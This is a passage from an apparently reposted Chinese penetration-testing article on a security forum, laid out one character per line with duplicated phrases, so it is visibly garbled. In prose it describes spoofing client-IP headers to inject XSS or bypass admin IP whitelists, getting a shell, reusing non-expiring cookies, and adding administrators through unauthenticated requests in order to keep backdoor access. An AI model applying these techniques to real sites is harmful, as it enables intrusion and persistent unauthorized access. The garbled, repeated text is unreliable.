送
请
求
即
可
)
P
S
:
如
果
挖
到
这
种
漏
洞
的
你
可
以
尝
试
利
用
e
x
p
e
c
t
等
方
式
执
行
命
令
g
e
t
s
h
e
l
l
了
。
场
景
:
被
忽
略
掉
的
隐
藏
功
能
场
景
:
被
忽
略
掉
的
隐
藏
功
能
不
知
道
大
家
有
没
有
碰
到
过
这
种
功
能
后
台
登
录
有
记
录
非
法
操
作
例
如
登
录
后
台
错
误
5
次
就
被
记
录
到
数
据
库
然
后
管
理
界
面
U
I
输
出
说
此
I
P
登
录
用
户
名
A
D
M
I
N
错
误
。
。
我
们
可
以
这
样
猜
想
:
获
取
I
P
有
漏
洞
可
以
伪
造
。
我
们
在
渗
透
中
有
几
种
请
求
务
必
要
修
改
的
。
那
就
是
浏
览
器
头
以
及
:
X
-
F
O
R
W
A
R
D
E
D
-
F
O
R
P
r
o
x
y
-
C
l
i
e
n
t
-
I
P
W
L
-
P
r
o
x
y
-
C
l
i
e
n
t
-
I
P
H
T
T
P
_
C
L
I
E
N
T
_
I
P
X
-
F
o
r
w
a
r
d
e
d
-
F
o
r
这
里
公
布
一
个
火
狐
浏
览
器
(
中
国
版
)
存
在
I
P
伪
造
漏
洞
。
你
可
以
往
这
里
插
入
X
S
S
,
当
然
你
也
可
以
修
改
其
他
I
P
来
绕
过
后
台
(
有
些
后
台
登
录
需
要
I
P
白
名
单
验
证
)
场
景
:
后
台
拿
不
了
场
景
:
后
台
拿
不
了
s
h
e
l
l
却
又
想
留
后
门
却
又
想
留
后
门
有
很
多
白
帽
子
都
有
挖
过
未
授
权
访
问
。
我
看
过
很
多
的
中
国
黑
客
入
侵
文
章
从
未
发
现
过
文
章
中
有
未
授
权
操
作
这
一
类
的
入
侵
网
站
。
我
记
得
1
4
年
在
广
州
培
训
P
H
P
的
时
候
。
老
师
要
求
每
个
小
组
写
一
个
网
站
程
序
出
来
,
答
辩
结
束
后
,
源
码
就
会
被
共
享
出
来
,
我
从
2
0
套
源
码
(
M
V
C
思
想
)
开
始
代
码
审
计
的
时
候
发
现
超
过
1
0
套
源
码
都
有
未
授
权
操
作
这
个
漏
洞
。
也
在
工
作
实
战
中
也
碰
到
很
多
这
种
漏
洞
。
。
不
知
道
是
程
序
员
太
新
手
,
还
是
太
大
意
,
漏
洞
是
这
样
的
:
访
问
后
台
功
能
的
时
候
做
了
限
制
(
未
授
权
不
能
访
问
)
,
但
是
在
其
他
类
上
却
没
做
任
何
限
制
列
如
添
加
数
据
。
我
们
跳
回
话
题
:
在
W
E
B
管
理
后
台
拿
w
e
b
s
h
e
l
l
的
时
候
再
无
能
为
力
的
情
况
下
,
但
是
你
又
想
长
时
间
进
入
后
台
。
方
法
:
1
、
有
些
站
C
O
O
K
I
E
也
有
永
不
过
期
的
,
你
可
以
记
录
他
的
C
O
O
K
I
E
利
用
它
来
进
行
登
录
。
方
法
:
2
、
挖
掘
未
授
权
操
作
。
列
如
尝
试
添
加
管
理
员
抓
包
记
录
U
R
L
以
及
参
数
等
。
。
。
在
未
登
录
的
情
况
下
进
行
添
加
。
总
结
:
渗
透
的
思
路
中
,
不
仅
仅
靠
技
术
总
结
:
渗
透
的
思
路
中
,
不
仅
仅
靠
技
术
靠
经
验
靠
经
验
最
重
要
的
是
脑
子
去
往
其
他
地
方
思
考
、
以
上
我
写
的
我
只
是
打
个
比
喻
。
其
最
重
要
的
是
脑
子
去
往
其
他
地
方
思
考
、
以
上
我
写
的
我
只
是
打
个
比
喻
。
其
实
在
很
多
场
景
中
得
自
己
学
会
去
随
机
应
变
。
实
在
很
多
场
景
中
得
自
己
学
会
去
随
机
应
变
。
流
程
:
分
析
流
程
:
分
析
—
>
猜
想
猜
想
—
>
实
验
实
验
—
>
结
果
(
运
气
好
结
果
(
运
气
好
技
术
有
创
新
)
技
术
有
创
新
)
*
本
文
原
创
作
者
:
心
东
,
本
文
属
本
文
原
创
作
者
:
心
东
,
本
文
属
F
r
e
e
B
u
f
原
创
奖
励
计
划
,
未
经
许
可
禁
止
转
载
原
创
奖
励
计
划
,
未
经
许
可
禁
止
转
载
阅
读
原
文
回复
举报
上一个主题
下一个主题
高级模式
B
Color
Image
Link
Quote
Code
Smilies
您需要登录后才可以回帖
登录
|
立即注册
本版积分规则
发表回复
!disable!!post_parseurl!
使用Markdown编辑器编辑
使用富文本编辑器编辑
回帖后跳转到最后一页
浏览过的版块
Web安全
发表
渗透测试